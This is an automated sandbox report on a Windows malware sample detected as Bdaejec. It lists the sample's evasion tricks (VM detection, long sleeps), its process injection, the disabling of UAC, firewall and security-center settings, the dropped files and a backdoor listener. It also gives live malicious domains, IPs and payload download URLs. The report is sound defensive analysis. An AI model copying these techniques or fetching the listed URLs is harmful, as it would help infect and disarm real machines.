Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 300000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 2100000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\Desktop\1.0.0.2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winmefmb.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\Desktop\1.0.0.2.exe Dropped PE file which has not been started: C:\iuepn.exe Jump to dropped file
Source: C:\Users\user\Desktop\1.0.0.2.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VF.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\1.0.0.2.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 6272 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 1524 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 2448 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3180 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996 Thread sleep time: -2100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 Thread sleep time: -360000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Users\user\Desktop\1.0.0.2.exe File opened: PhysicalDrive0 Jump to behavior
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 005B1754h 2_2_005B1718
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep, 0_2_02B6BADD
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep, 0_2_02B657A0
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 2_2_005B29E2
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 2_2_005B2B8C
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 300000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 2100000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Thread delayed: delay time: 360000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior
Source: Amcache.hve.2.dr Binary or memory string: VMware
Source: dwm.exe, 00000007.00000002.3403250038.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr Binary or memory string: VMware, Inc.
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpi
Source: Amcache.hve.2.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk<=
Source: Amcache.hve.2.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: dwm.exe, 00000007.00000002.3403250038.000001D156B0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWengineer
Source: Amcache.hve.2.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\1.0.0.2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\1.0.0.2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\1.0.0.2.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_02BEBCD0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_00D63044 mov eax, dword ptr fs:[00000030h] 0_2_00D63044
Enables debug privileges
Source: C:\Users\user\Desktop\1.0.0.2.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory allocated: C:\Windows\System32\fontdrvhost.exe base: AD0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory allocated: C:\Windows\System32\fontdrvhost.exe base: DE0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory allocated: C:\Windows\System32\dwm.exe base: 380000 protect: page execute and read and write Jump to behavior
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification, 0_2_02B6CC92
Writes to foreign memory regions
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: AD0000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory written: C:\Windows\System32\fontdrvhost.exe base: DE0000 Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Memory written: C:\Windows\System32\dwm.exe base: 380000 Jump to behavior
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: dwm.exe, 00000007.00000002.3405771317.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000007.00000000.2226927771.000001D159439000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: SciTE.exe.2.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 2_2_005B1718
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B61B0E GetUserNameA,RegOpenKeyExA,RegCreateKeyA,GlobalAlloc,GlobalFree, 0_2_02B61B0E
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 2_2_005B139F

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Users\user\Desktop\1.0.0.2.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride Jump to behavior
Deletes keys which are related to windows safe boot (disables safe mode boot)
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell Jump to behavior
Disables UAC (registry)
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA Jump to behavior
Disables user account control notifications
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc Jump to behavior
Modifies the windows firewall
Source: C:\Users\user\Desktop\1.0.0.2.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications Jump to behavior
Modifies the windows firewall notifications settings
Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Registry value created: DisableNotifications 1 Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.2.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B63911 socket,setsockopt,bind,recvfrom, 0_2_02B63911
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467981 Sample: 1.0.0.2.exe Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 40 www.careerdesk.org 2->40 42 g2.arrowhitech.com 2->42 44 7 other IPs or domains 2->44 54 Snort IDS alert for network traffic 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 13 other signatures 2->60 8 1.0.0.2.exe 190 25 2->8         started        signatures3 process4 dnsIp5 46 ahmediye.net 78.46.2.155, 49718, 49725, 80 HETZNER-ASDE Germany 8->46 48 www.careerdesk.org 54.244.188.177, 49712, 49720, 80 AMAZON-02US United States 8->48 50 2 other IPs or domains 8->50 26 C:\iuepn.exe, PE32 8->26 dropped 28 C:\Users\user\Desktop\VF.dll, PE32 8->28 dropped 30 C:\Users\user\AppData\Local\...\winmefmb.exe, PE32 8->30 dropped 32 2 other malicious files 8->32 dropped 62 Creates autorun.inf (USB autostart) 8->62 64 Changes security center settings (notifications, updates, antivirus, firewall) 8->64 66 Contains functionality to inject threads in other processes 8->66 68 8 other signatures 8->68 13 rksowY.exe 14 8->13         started        18 fontdrvhost.exe 8->18 injected 20 fontdrvhost.exe 8->20 injected 22 dwm.exe 8->22 injected file6 signatures7 process8 dnsIp9 52 arthur.niria.biz 44.221.84.105, 49710, 49715, 49716 AMAZON-AESUS United States 13->52 34 C:\Program Files\7-Zip\Uninstall.exe, PE32 13->34 dropped 36 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 13->36 dropped 38 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 13->38 dropped 70 Antivirus detection for dropped file 13->70 72 Multi AV Scanner detection for dropped file 13->72 74 Detected unpacking (changes PE section rights) 13->74 76 2 other signatures 13->76 24 WerFault.exe 2 13->24         started        file10 signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
44.221.84.105
 ddos.dnsnb8.net United States
14618 AMAZON-AESUS true
78.46.2.155
 ahmediye.net Germany
24940 HETZNER-ASDE true
54.244.188.177
 www.careerdesk.org United States
16509 AMAZON-02US true
37.230.104.89
 ampyazilim.com.tr Turkey
42807 AEROTEK-ASTR true
85.17.167.196
 unknown Netherlands
60781 LEASEWEB-NL-AMS-01NetherlandsNL false

Contacted Domains

Name IP Active
www.careerdesk.org 54.244.188.177 true
ddos.dnsnb8.net 44.221.84.105 true
ampyazilim.com.tr 37.230.104.89 true
apple-pie.in 44.221.84.105 true
arthur.niria.biz 44.221.84.105 true
ahmediye.net 78.46.2.155 true
amsamex.com unknown unknown
althawry.org unknown unknown
g2.arrowhitech.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.careerdesk.org/images/xs.jpg?5059c3=10531718 true
  • Avira URL Cloud: malware
 unknown
http://ahmediye.net/xs.jpg?5827cf=5777359 true
  • Avira URL Cloud: safe
 unknown
http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=21380388 true
  • Avira URL Cloud: safe
 unknown
http://ddos.dnsnb8.net:799/cj//k1.rar true
  • Avira URL Cloud: malware
 unknown
http://ahmediye.net/xs.jpg?e14213=73812575 true
  • Avira URL Cloud: safe
 unknown
http://ampyazilim.com.tr/images/xs2.jpg?1 true
  • Avira URL Cloud: safe
 unknown
http://arthur.niria.biz/xs.jpg?c12b4b=126595310 true
  • Avira URL Cloud: malware
 unknown
http://apple-pie.in/images/xs.jpg?ce2fff=121614327 true
  • Avira URL Cloud: phishing
 unknown
http://apple-pie.in/images/xs.jpg?554c8c=39131092 true
  • Avira URL Cloud: phishing
 unknown
http://arthur.niria.biz/xs.jpg?51fbda=48356010 true
  • Avira URL Cloud: malware
 unknown
http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430 true
  • Avira URL Cloud: safe
 unknown
http://www.careerdesk.org/images/xs.jpg?ad5654=34079484 true
  • Avira URL Cloud: malware
 unknown